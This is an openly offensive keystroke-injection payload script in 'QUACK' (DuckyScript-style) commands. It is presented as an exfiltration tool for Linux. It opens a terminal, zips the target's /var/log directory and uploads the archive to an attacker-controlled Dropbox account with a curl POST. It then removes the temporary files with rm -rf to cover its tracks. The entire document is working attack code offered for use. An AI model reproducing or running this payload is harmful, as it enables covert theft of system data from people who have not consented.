* ######################################################
* #                                                    |
* # Title        : Exfiltrate Linux Logs With Dropbox  |
* # Author       : Aleff                               |
* # Version      : 1.0                                 |
* # Category     : Exfiltration, Execution             |
* # Target       : Linux                               |
* #                                                    |
* ######################################################

* Requirements:
*     - Internet Connection
*     - Dropbox Account
*     - - DROPBOX_ACCESS_TOKEN


QUACK DELAY 1000
QUACK CTRL-ALT t

* Required: Set here your Dropbox access TOKEN
QUACK DELAY 2000
QUACK STRING ACCESS_TOKEN="TOKEN"
QUACK ENTER


QUACK DELAY 500
QUACK STRING USER_NAME=$(whoami)
QUACK ENTER

* Create random num
QUACK DELAY 500
QUACK STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
QUACK ENTER

* Folder path
QUACK DELAY 500
QUACK STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
QUACK ENTER

* Zip path
QUACK DELAY 500
QUACK STRING ZIP_NAME="$RANDOM.zip"
QUACK ENTER
QUACK DELAY 500
QUACK STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
QUACK ENTER

* Default log path
QUACK DELAY 500
QUACK STRING LOG_PATH="/var/log/"
QUACK ENTER

QUACK DELAY 500
QUACK STRING zip -r "$ZIP_PATH" "$LOG_PATH"
QUACK ENTER

* Delay of zipping operation - it depends
QUACK DELAY 10000

QUACK DELAY 500
QUACK STRING DROPBOX_FOLDER="/$ZIP_NAME"
QUACK ENTER

* Send to Dropbox function
* DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
QUACK DELAY 500
QUACK STRING curl -X POST DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
QUACK ENTER

* Send timing - it depends
QUACK DELAY 5000

QUACK DELAY 500
QUACK STRING rm -rf "$TMP_FOLDER_PATH"
QUACK ENTER
